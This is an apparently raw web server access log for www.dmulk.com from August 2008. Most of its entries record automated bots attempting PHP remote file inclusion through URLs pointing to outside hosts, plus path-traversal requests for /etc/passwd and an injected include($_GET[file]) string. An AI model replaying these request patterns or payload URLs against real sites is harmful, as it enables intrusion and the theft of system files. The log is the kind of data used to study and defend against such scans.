195.218.170.130 - - [18/Aug/2008:10:04:29 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:10:04:30 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:10:04:31 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.143.183 - - [18/Aug/2008:10:04:51 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [18/Aug/2008:10:04:52 -0700] "GET //include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [18/Aug/2008:10:04:52 -0700] "GET /logs//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:10:05:33 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:10:05:40 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:10:05:40 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:10:05:42 -0700] "GET /logs/access_080708.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:10:05:43 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:10:05:43 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:06:07 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:06:07 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.248 - - [18/Aug/2008:10:06:23 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.realschuleochtrup.de//components/com_simpleboard/id-x3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.242.99.248 - - [18/Aug/2008:10:06:23 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.realschuleochtrup.de//components/com_simpleboard/id-x3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.121.143.183 - - [18/Aug/2008:10:06:26 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:10:06:36 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:10:06:36 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:10:06:36 -0700] "GET /admin.php?DOCUMENT_ROOT=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:10:06:36 -0700] "GET /admin.php?DOCUMENT_ROOT=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:06:47 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:10:06:47 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:10:07:29 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:10:07:30 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:10:10:07 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:10:10:08 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:10:11:49 -0700] "GET /logs/access_080505.log/index.php?menu=deti&page=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:10:11:49 -0700] "GET /logs/index.php?menu=deti&page=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:10:11:52 -0700] "GET /index.php?menu=deti&page=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 200 10991 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:10:15:13 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:10:15:13 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:10:15:18 -0700] "GET /logs/access_080806.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:10:15:18 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:10:15:18 -0700] "GET /logs/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:10:15:30 -0700] "GET /index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:10:15:41 -0700] "GET /index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:10:15:58 -0700] "GET /logs/access_080131.log/index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:10:15:58 -0700] "GET /index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:10:15:58 -0700] "GET /logs/index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:10:16:02 -0700] "GET /index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:10:16:02 -0700] "GET /logs/access_080131.log/index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.131.127.13 - - [18/Aug/2008:10:16:02 -0700] "GET /logs/index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.153.33.182 - - [18/Aug/2008:10:17:11 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://esmakoken.com/valeandart/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [18/Aug/2008:10:17:11 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://esmakoken.com/valeandart/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:10:17:35 -0700] "GET /index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:10:17:47 -0700] "GET /logs/access_080615.log HTTP/1.1" 200 2583369 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:10:17:57 -0700] "GET /logs/access_080806.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:10:17:57 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:10:17:57 -0700] "GET /logs/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:10:18:02 -0700] "GET /logs/index2.php?p=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:10:18:23 -0700] "GET /logs/access_080730.log HTTP/1.1" 200 3354341 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:10:18:57 -0700] "GET /logs/access_080625.log/ipblock.inc.php?path_escape=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:18:59 -0700] "GET /logs/access_080809.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:18:59 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:19:00 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:04 -0700] "GET /logs/access_080626.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:10 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:15 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:16 -0700] "GET /logs/access_080626.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:21 -0700] "GET /logs/access_080708.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:21 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:27 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:19:27 -0700] "GET /logs/access_080708.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:19:44 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.201 - - [18/Aug/2008:10:19:58 -0700] "GET /blog/?nggpage=2&pageid=169&show=gallery HTTP/1.1" 200 9745 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
91.84.19.133 - - [18/Aug/2008:10:20:26 -0700] "GET /logs/access_080806.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:10:20:26 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:10:20:27 -0700] "GET /logs/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [18/Aug/2008:10:22:32 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.militaria.com/2? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [18/Aug/2008:10:22:33 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.militaria.com/2? HTTP/1.1" 200 10955 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:10:22:43 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:10:22:43 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:10:23:43 -0700] "GET /logs/access_080207.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:10:23:43 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:10:23:44 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:10:23:45 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:10:23:45 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:10:25:05 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [18/Aug/2008:10:25:06 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:10:27:05 -0700] "GET /logs/access_080625.log/ipblock.inc.php?path_escape=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:10:27:09 -0700] "GET /logs/access_080725.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:10:27:39 -0700] "GET /logs/access_080207.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:10:27:39 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:10:27:39 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:10:27:52 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:10:27:53 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:10:27:55 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:10:27:55 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:10:28:31 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:10:29:06 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.businesshost.it/base/attachments/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:10:29:40 -0700] "GET /logs/access_080713.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:34:29 -0700] "GET /logs/access_080108.log/services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:34:29 -0700] "GET /services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:34:29 -0700] "GET /logs/services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:34:30 -0700] "GET /logs/access_080308.log/services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:34:46 -0700] "GET /index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10952 "-" "libwww-perl/5.803" "www.dmulk.com"
213.20.229.11 - - [18/Aug/2008:10:34:47 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.businesshost.it/base/attachments/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:11 -0700] "GET /logs/access_080806.log/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:18 -0700] "GET /logs/access_080806.log/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:18 -0700] "GET /logs/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:19 -0700] "GET /index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10982 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:21 -0700] "GET /logs/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:10:36:21 -0700] "GET /index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10982 "-" "libwww-perl/5.79" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:10:36:35 -0700] "GET /logs/access_080809.log//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:10:37:00 -0700] "GET /logs/access_080626.log/index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:10:39:19 -0700] "GET /logs//poll/png.php?include_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:10:39:19 -0700] "GET //poll/png.php?include_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:39:30 -0700] "GET /logs/access_080626.log%20/services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:39:54 -0700] "GET /logs/access_080315.log/errors.php?error=http://roux.be//Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:40:00 -0700] "GET /errors.php?error=http://roux.be//Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:40:05 -0700] "GET /logs/errors.php?error=http://roux.be//Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:10:40:29 -0700] "GET /logs/access_080226.log/services.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:10:40:32 -0700] "GET /logs/access_080211.log/index.php?id=1&lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:10:42:03 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:10:42:04 -0700] "GET //popup_window.php?site_isp_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:10:42:39 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:10:42:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:10:42:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:10:42:50 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:10:43:03 -0700] "GET /logs/access_080809.log/errors.php?error=http://roux.be//Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [18/Aug/2008:10:43:36 -0700] "GET /logs/access_071226.log//calendar.php?l=http://www.cookaround.com/yabbse1/impex/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
